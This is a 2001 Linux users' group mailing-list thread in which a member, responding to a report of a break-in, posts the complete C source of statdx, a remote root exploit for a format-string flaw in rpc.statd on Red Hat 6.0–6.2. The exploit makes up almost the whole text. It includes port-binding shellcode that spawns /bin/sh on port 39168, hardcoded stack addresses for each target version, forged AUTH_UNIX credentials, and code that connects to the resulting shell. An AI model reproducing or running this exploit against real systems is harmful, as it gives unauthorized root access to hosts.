cdowns wrote:
> cdowns wrote:
>
> > "Karl J. Runge" wrote:
> >
> > > On Mon, 19 Feb 2001, "Robert W. Fowler" <[EMAIL PROTECTED]> wrote:
> > > >
> > > > i think one of our machines got nailed just This morning with a
> > > > suspected named exploit....
> > > > i can post any info that ive found if anyone would like to examine it,
> > > > im still sifting through it myself.
> > > > Time to Wipe the disk
> > > > Rob
> > >
> > > Is the exploit connection TCP only, UDP only, or involves both?
> > >
> > > Thanks,
> > >
> > > Karl
> > >
> > > **********************************************************
> > > To unsubscribe from this list, send mail to
> > > [EMAIL PROTECTED] with the following text in the
> > > *body* (*not* the subject line) of the letter:
> > > unsubscribe gnhlug
> > > **********************************************************
> >
> > the exploit most likely used was statdx.c here is the source :
> >
> > -D
> >
> > /**
> > *** statdx
> > *** Redhat Linux 6.0/6.1/6.2 rpc.statd remote root exploit (IA32)
> > *** by ron1n <[EMAIL PROTECTED]>
> > ***
> > *** August 3, 2000
> > *** Sydney, Australia
> > ***
> > *** Oh you prob'ly won't remember me
> > *** It's prob'ly ancient history
> > *** I'm one of the chosen few
> > *** Who went ahead and fell for you
> > ***
> > *** $ gcc -o statdx statdx.c ; ./statdx -h
> > ***
> > *** Thanks to smiler for the format string vulnerability clarification.
> > ***
> > *** background info
> > *** ---------------
> > *** rpc.statd is an ONC RPC server that implements the Network Status
> > *** Monitor RPC protocol to provide reboot notification. It is used by
> > *** the NFS file locking service (rpc.lockd) when it performs lock
> > *** recovery.
> > ***
> > *** Due to a format string vulnerability in a call to syslog() within
> > *** its logging module, rpc.statd can be exploited remotely by script
> > *** kids bent on breaking into your Redhat Linux box and defacing your
> > *** website with crackpot political musings.
> > ***
> > *** This is not a traditional buffer overflow vulnerability. The data
> > *** are kept within the bounds of the buffer by means of a call to
> > *** vsnprintf(). The saved return address can be overwritten indirectly
> > *** without a contiguous payload. syslog() is given, for the most part,
> > *** a user-supplied format string with no process-supplied arguments.
> > *** Our format string will, if carefully constructed, cause the process
> > *** to cull non-arbitrary addresses from the top of the stack for
> > *** sequential writes using controlled values. Exploitation requires
> > *** an executable stack on the target host -- almost invariably the
> > *** case. This problem was corrected in the nfs-utils-0.1.9.1 rpm.
> > ***
> > *** exploit info
> > *** ------------
> > *** You have one shot at this in most situations, so get it right!
> > ***
> > *** If you know the port number rpc.statd is serving requests on, you
> > *** can supply the port number on the commandline to bypass the initial
> > *** portmapper query. This is very useful for hosts which are filtering
> > *** inbound connections to the portmapper. The default attack protocol
> > *** is UDP. There is a commandline option to use TCP. Apparently, the
> > *** dispatcher uses both protocols by default.
> > ***
> > *** If you're only interested in exploiting a host, then you can safely
> > *** skip the following information. You'll only need a buffer address
> > *** to get started. This buffer address will either be one of my canned
> > *** ones or your own one. It must be precise, and this is where you're
> > *** likely to experience difficulties with your attacks.
> > ***
> > *** [va_list][str][4][r][4][r+1][4][r+2][4][r+3]----->
> > *** | |
> > *** %esp buffer[1024]
> > ***
> > *** [%8x..][%!x][%n][%!x][%n][%!x][%n][%!x][%n][sc]--->
> > *** | r | r+1 | r+2 | r+3 |
> > ***
> > *** buffer -> This is the address you'll need (-a and -l options)
> > *** str -> Process-supplied string; 24 bytes long
> > *** 4 -> Duplicate dwords to satisfy the %!d specifiers and
> > *** the double %n when two successive values are equal
> > *** r -> Stack position of saved eip
> > *** %8x.. -> Wipes the va_list dword and str; 9 by default (-w option)
> > *** %!x -> Used for padding to form an aggregate overwrite value;
> > *** the exclamation mark denotes a field width. This may
> > *** or may not be present, depending on the value. An
> > *** algorithm is used to allow tricky values.
> > *** %n -> Writes overwrite value to the corresponding address
> > *** sc -> Nops + portbinding shellcode (port 39168)
> > ***
> > *** Only modify the default wipe value and the default offset value if you
> > *** know what you're doing.
> > ***
> > *** An easy way to get the buffer address for simulation systems that you
> > *** have privileged access to:
> > ***
> > *** [term 1]# ltrace -p `pidof rpc.statd` -o foo
> > *** [term 2]$ ./statdx -a 0x41414141 localhost
> > *** [term 1]# grep vsnprintf foo | head -1 | sed 's/.*(//' | \
> > *** awk -F"," '{print $1}'
> > ***
> > *** (Of course, ensure that rpc.statd is started at boot time and not from
> > *** an interactive shell, otherwise it will inherit a larger environment
> > *** and blow the accuracy of your findings.)
> > ***
> > *** Ok, longwinded enough. Let's dance.
> > ***
> > *** greets
> > *** ------
> > *** ADM, attrition, rogues, security.is, teso
> > ***
> > **/
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <errno.h>
> > #include <unistd.h>
> > #include <netdb.h>
> > #include <rpc/rpc.h>
> > #include <sys/types.h>
> > #include <sys/time.h>
> > #include <sys/socket.h>
> > #include <netinet/in.h>
> >
> > #define SM_PROG 100024
> > #define SM_VERS 1
> > #define SM_STAT 1
> > #define SM_MAXSTRLEN 1024
> >
> > #define max(a,b) ((a)>(b)?(a):(b))
> >
> > #define NOP 0x90
> >
> > /*
> > ** Non-ripped linux IA32 portbinding shellcode.
> > ** port: 39168 ; length: 133 bytes
> > */
> >
> > char shellcode[] =
> > "\x31\xc0" /* xorl %eax,%eax */
> > /* jmp ricochet ------------------------------------------------------- */
> > "\xeb\x7c" /* jmp 0x7c */
> > /* kungfu: ------------------------------------------------------------ */
> > "\x59" /* popl %ecx */
> > "\x89\x41\x10" /* movl %eax,0x10(%ecx) */
> > /* ------------------------------------ socket(2,1,0); ---------------- */
> > "\x89\x41\x08" /* movl %eax,0x8(%ecx) */
> > "\xfe\xc0" /* incb %al */
> > "\x89\x41\x04" /* movl %eax,0x4(%ecx) */
> > "\x89\xc3" /* movl %eax,%ebx */
> > "\xfe\xc0" /* incb %al */
> > "\x89\x01" /* movl %eax,(%ecx) */
> > "\xb0\x66" /* movb $0x66,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ bind(sd,&sockaddr,16); -------- */
> > "\xb3\x02" /* movb $0x2,%bl */
> > "\x89\x59\x0c" /* movl %ebx,0xc(%ecx) */
> > "\xc6\x41\x0e\x99" /* movb $0x99,0xe(%ecx) */
> > "\xc6\x41\x08\x10" /* movb $0x10,0x8(%ecx) */
> > "\x89\x49\x04" /* movl %ecx,0x4(%ecx) */
> > "\x80\x41\x04\x0c" /* addb $0xc,0x4(%ecx) */
> > "\x88\x01" /* movb %al,(%ecx) */
> > "\xb0\x66" /* movb $0x66,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ listen(sd,blah); -------------- */
> > "\xb3\x04" /* movb $0x4,%bl */
> > "\xb0\x66" /* movb $0x66,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ accept(sd,0,16); -------------- */
> > "\xb3\x05" /* movb $0x5,%bl */
> > "\x30\xc0" /* xorb %al,%al */
> > "\x88\x41\x04" /* movb %al,0x4(%ecx) */
> > "\xb0\x66" /* movb $0x66,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ dup2(cd,0); ------------------- */
> > "\x89\xce" /* movl %ecx,%esi */
> > "\x88\xc3" /* movb %al,%bl */
> > "\x31\xc9" /* xorl %ecx,%ecx */
> > "\xb0\x3f" /* movb $0x3f,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ dup2(cd,1); ------------------- */
> > "\xfe\xc1" /* incb %cl */
> > "\xb0\x3f" /* movb $0x3f,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ dup2(cd,2); ------------------- */
> > "\xfe\xc1" /* incb %cl */
> > "\xb0\x3f" /* movb $0x3f,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ execve("/bin/sh",argv,0); ----- */
> > "\xc7\x06\x2f\x62\x69\x6e" /* movl $0x6e69622f,(%esi) */
> > "\xc7\x46\x04\x2f\x73\x68\x41" /* movl $0x4168732f,0x4(%esi) */
> > "\x30\xc0" /* xorb %al,%al */
> > "\x88\x46\x07" /* movb %al,0x7(%esi) */
> > "\x89\x76\x0c" /* movl %esi,0xc(%esi) */
> > "\x8d\x56\x10" /* leal 0x10(%esi),%edx */
> > "\x8d\x4e\x0c" /* leal 0xc(%esi),%ecx */
> > "\x89\xf3" /* movl %esi,%ebx */
> > "\xb0\x0b" /* movb $0xb,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ exit(blah); ------------------- */
> > "\xb0\x01" /* movb $0x1,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ricochet: call kungfu ---------------------------------------------- */
> > "\xe8\x7f\xff\xff\xff"; /* call -0x81 */
> >
> > enum res
> > {
> > stat_succ,
> > stat_fail
> > };
> >
> > struct sm_name
> > {
> > char *mon_name;
> > };
> >
> > struct sm_stat_res
> > {
> > enum res res_stat;
> > int state;
> > };
> >
> > struct type
> > {
> > int type;
> > char *desc;
> > char *code;
> > u_long bufpos;
> > int buflen;
> > int offset;
> > int wipe;
> > };
> >
> > struct type types[] =
> > {
> > {0, "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 1024, 600,
> > 9},
> > {1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9},
> >
> > {2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314, 1024, 600, 9},
> >
> > {0, NULL, NULL, 0, 0, 0, 0}
> > };
> >
> > bool_t
> > xdr_sm_name(XDR *xdrs, struct sm_name *objp)
> > {
> > if (!xdr_string(xdrs, &objp->mon_name, SM_MAXSTRLEN))
> > return (FALSE);
> > return (TRUE);
> > }
> >
> > bool_t
> > xdr_res(XDR *xdrs, enum res *objp)
> > {
> > if (!xdr_enum(xdrs, (enum_t *)objp))
> > return (FALSE);
> > return (TRUE);
> > }
> >
> > bool_t
> > xdr_sm_stat_res(XDR *xdrs, struct sm_stat_res *objp)
> > {
> > if (!xdr_res(xdrs, &objp->res_stat))
> > return (FALSE);
> > if (!xdr_int(xdrs, &objp->state))
> > return (FALSE);
> > return (TRUE);
> > }
> >
> > void
> > usage(char *app)
> > {
> > int i;
> >
> > fprintf(stderr, "statdx by ron1n <[EMAIL PROTECTED]>\n");
> > fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l len]\n", app);
> > fprintf(stderr, "\t[-o offset] [-w num] [-s secs] [-d type]
> > <target>\n");
> > fprintf(stderr, "-t\tattack a tcp dispatcher [udp]\n");
> > fprintf(stderr, "-p\trpc.statd serves requests on <port> [query]\n");
> > fprintf(stderr, "-a\tthe stack address of the buffer is <addr>\n");
> > fprintf(stderr, "-l\tthe length of the buffer is <len> [1024]\n");
> > fprintf(stderr, "-o\tthe offset to return to is <offset> [600]\n");
> > fprintf(stderr, "-w\tthe number of dwords to wipe is <num> [9]\n");
> > fprintf(stderr, "-s\tset timeout in seconds to <secs> [5]\n");
> > fprintf(stderr, "-d\tuse a hardcoded <type>\n");
> > fprintf(stderr, "Available types:\n");
> >
> > for(i = 0; types[i].desc; i++)
> > fprintf(stderr, "%d\t%s\n", types[i].type, types[i].desc);
> >
> > exit(EXIT_FAILURE);
> > }
> >
> > void
> > runshell(int sockd)
> > {
> > char buff[1024];
> > int fmax, ret;
> > fd_set fds;
> >
> > fmax = max(fileno(stdin), sockd) + 1;
> > send(sockd, "cd /; ls -alF; id;\n", 19, 0);
> >
> > for(;;)
> > {
> >
> > FD_ZERO(&fds);
> > FD_SET(fileno(stdin), &fds);
> > FD_SET(sockd, &fds);
> >
> > if(select(fmax, &fds, NULL, NULL, NULL) < 0)
> > {
> > perror("select()");
> > exit(EXIT_FAILURE);
> > }
> >
> > if(FD_ISSET(sockd, &fds))
> > {
> > bzero(buff, sizeof buff);
> > if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
> > {
> > perror("recv()");
> > exit(EXIT_FAILURE);
> > }
> > if(!ret)
> > {
> > fprintf(stderr, "Connection closed\n");
> > exit(EXIT_FAILURE);
> > }
> > write(fileno(stdout), buff, ret);
> > }
> >
> > if(FD_ISSET(fileno(stdin), &fds))
> > {
> > bzero(buff, sizeof buff);
> > ret = read(fileno(stdin), buff, sizeof buff);
> > errno = 0;
> > if(send(sockd, buff, ret, 0) != ret)
> > {
> > if(errno) perror("send()");
> > else fprintf(stderr, "Transmission loss\n");
> > exit(EXIT_FAILURE);
> > }
> > }
> > }
> > }
> >
> > void
> > connection(struct sockaddr_in host)
> > {
> > int sockd;
> >
> > host.sin_port = htons(39168);
> >
> > if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
> > {
> > perror("socket()");
> > exit(EXIT_FAILURE);
> > }
> >
> > if(!connect(sockd, (struct sockaddr *) &host, sizeof host))
> > {
> > printf("OMG! You now have rpc.statd technique!@#$!\n");
> > runshell(sockd);
> > }
> >
> > close(sockd);
> > }
> >
> > char *
> > wizardry(char *sc, u_long bufpos, int buflen, int offset, int wipe)
> > {
> > int i, j, cnt, pad;
> > char pbyte, *buff, *ptr;
> > u_long retpos;
> > u_long dstpos;
> >
> > while(bufpos % 4) bufpos--;
> > /* buflen + ebp */
> > retpos = bufpos + buflen + 4;
> >
> > /*
> > ** 0x00 == '\0'
> > ** 0x25 == '%'
> > ** (add troublesome bytes)
> > ** Alignment requirements aid comparisons
> > */
> >
> > pbyte = retpos & 0xff;
> >
> > /* Yes, it's 0x24 */
> > if(pbyte == 0x00 || pbyte == 0x24)
> > {
> > fprintf(stderr, "Target address space contains a poison char\n");
> > exit(EXIT_FAILURE);
> > }
> >
> > /*
> > ** Unless the user gives us a psychotic value,
> > ** the address should now be clean.
> > */
> >
> > /* str */
> > cnt = 24;
> > /* 1 = process nul */
> > buflen -= cnt + 1;
> >
> > if(!(buff = malloc(buflen + 1)))
> > {
> > perror("malloc()");
> > exit(EXIT_FAILURE);
> > }
> >
> > ptr = buff;
> > memset(ptr, NOP, buflen);
> >
> > for(i = 0; i < 4; i++, retpos++)
> > {
> > /* junk dword */
> > for(j = 0; j < 4; j++)
> > *ptr++ = retpos >> j * 8 & 0xff;
> > /* r + i */
> > memcpy(ptr, ptr - 4, 4);
> > ptr += 4; cnt += 8;
> > }
> >
> > /* restore */
> > retpos -= 4;
> >
> > for(i = 0; i < wipe; i++)
> > {
> > /* consistent calculations */
> > strncpy(ptr, "%8x", 3);
> > ptr += 3; cnt += 8;
> > }
> >
> > dstpos = bufpos + offset;
> >
> > /*
> > ** This small algorithm of mine can be used
> > ** to obtain "difficult" values..
> > */
> >
> > for(i = 0; i < 4; i++)
> > {
> > pad = dstpos >> i * 8 & 0xff;
> > if(pad == (cnt & 0xff))
> > {
> > sprintf(ptr, "%%n%%n");
> > ptr += 4; continue;
> > }
> > else
> > {
> > int tmp;
> > /* 0xffffffff = display count of 8 */
> > while(pad < cnt || pad % cnt <= 8) pad += 0x100;
> > pad -= cnt, cnt += pad;
> > /* the source of this evil */
> > tmp = sprintf(ptr, "%%%dx%%n", pad);
> > ptr += tmp;
> > }
> >
> > }
> >
> > *ptr = NOP;
> > /* plug in the shellcode */
> > memcpy(buff + buflen - strlen(sc), sc, strlen(sc));
> > buff[buflen] = '\0';
> >
> > printf("buffer: %#lx length: %d (+str/+nul)\n", bufpos, strlen(buff));
> > printf("target: %#lx new: %#lx (offset: %d)\n", retpos, dstpos,
> > offset);
> > printf("wiping %d dwords\n", wipe);
> > return buff;
> > }
> >
> > struct in_addr
> > getip(char *host)
> > {
> > struct hostent *hs;
> >
> > if((hs = gethostbyname(host)) == NULL)
> > {
> > herror("gethostbyname()");
> > exit(EXIT_FAILURE);
> > }
> >
> > return *((struct in_addr *) hs->h_addr);
> > }
> >
> > int
> > main(int argc, char **argv)
> > {
> > int ch;
> > char *buff;
> >
> > CLIENT *clnt;
> > enum clnt_stat res;
> > struct timeval tv, tvr;
> > struct sm_name smname;
> > struct sm_stat_res smres;
> > struct sockaddr_in addr;
> >
> > int type = -1;
> > int usetcp = 0;
> > int timeout = 5;
> > int wipe = 9;
> > int offset = 600;
> > int buflen = 1024;
> > char *target;
> > char *sc = shellcode;
> > u_short port = 0;
> > u_long bufpos = 0;
> >
> > int sockp = RPC_ANYSOCK;
> >
> > extern char *optarg;
> > extern int optind;
> > extern int opterr;
> > opterr = 0;
> >
> > while((ch = getopt(argc, argv, "tp:a:l:o:w:s:d:")) != -1)
> > {
> > switch(ch)
> > {
> > case 't': usetcp = 1; break;
> > case 'p': sscanf(optarg, "%hu", &port); break;
> > case 'a': sscanf(optarg, "%lx", &bufpos); break;
> > case 'l': buflen = atoi(optarg); break;
> > case 'o': offset = atoi(optarg); break;
> > case 's': timeout = atoi(optarg); break;
> > case 'w': wipe = atoi(optarg); break;
> > case 'd': type = atoi(optarg); break;
> > default : usage(argv[0]);
> > }
> > }
> >
> > if(!(target = argv[optind]))
> > {
> > fprintf(stderr, "No target host specified\n");
> > exit(EXIT_FAILURE);
> > }
> >
> > if(type >= 0)
> > {
> > if(type >= sizeof types / sizeof types[0] - 1)
> > {
> > fprintf(stderr, "Invalid type\n");
> > exit(EXIT_FAILURE);
> > }
> >
> > sc = types[type].code;
> > bufpos = types[type].bufpos;
> > buflen = types[type].buflen;
> > offset = types[type].offset;
> > wipe = types[type].wipe;
> > }
> >
> > if(!bufpos)
> > {
> > fprintf(stderr, "No buffer address specified\n");
> > exit(EXIT_FAILURE);
> > }
> >
> > bzero(&addr, sizeof addr);
> > addr.sin_family = AF_INET;
> > addr.sin_port = htons(port);
> > addr.sin_addr = getip(target);
> >
> > tv.tv_sec = timeout;
> > tv.tv_usec = 0;
> >
> > if(!usetcp)
> > {
> > clnt = clntudp_create(&addr, SM_PROG, SM_VERS, tv, &sockp);
> > if(clnt == NULL)
> > {
> > clnt_pcreateerror("clntudp_create()");
> > exit(EXIT_FAILURE);
> > }
> > tvr.tv_sec = 2;
> > tvr.tv_usec = 0;
> > clnt_control(clnt, CLSET_RETRY_TIMEOUT, (char *) &tvr);
> > }
> > else
> > {
> > clnt = clnttcp_create(&addr, SM_PROG, SM_VERS, &sockp, 0, 0);
> > if(clnt == NULL)
> > {
> > clnt_pcreateerror("clnttcp_create()");
> > exit(EXIT_FAILURE);
> > }
> > }
> >
> > /* AUTH_UNIX / AUTH_SYS authentication forgery */
> > clnt->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
> >
> > buff = wizardry(sc, bufpos, buflen, offset, wipe);
> > smname.mon_name = buff;
> >
> > res = clnt_call(clnt, SM_STAT, (xdrproc_t) xdr_sm_name,
> > (caddr_t) &smname, (xdrproc_t) xdr_sm_stat_res,
> > (caddr_t) &smres, tv);
> >
> > if(res != RPC_SUCCESS)
> > {
> > clnt_perror(clnt, "clnt_call()");
> > printf("A timeout was expected. Attempting connection to
> > shell..\n");
> > sleep(5); connection(addr);
> > printf("Failed\n");
> > }
> > else
> > {
> > printf("Failed - statd returned res_stat: (%s) state: %d\n",
> > smres.res_stat ? "failure" : "success", smres.state);
> > }
> >
> > free(buff);
> > clnt_destroy(clnt);
> > return -1;
> > }
>
> **********************************************************
> To unsubscribe from this list, send mail to
> [EMAIL PROTECTED] with the following text in the
> *body* (*not* the subject line) of the letter:
> unsubscribe gnhlug
> **********************************************************
whoops i was thinking nfs stuff sorry, anyway this is in the loose right now.
-D
**********************************************************
To unsubscribe from this list, send mail to
[EMAIL PROTECTED] with the following text in the
*body* (*not* the subject line) of the letter:
unsubscribe gnhlug
**********************************************************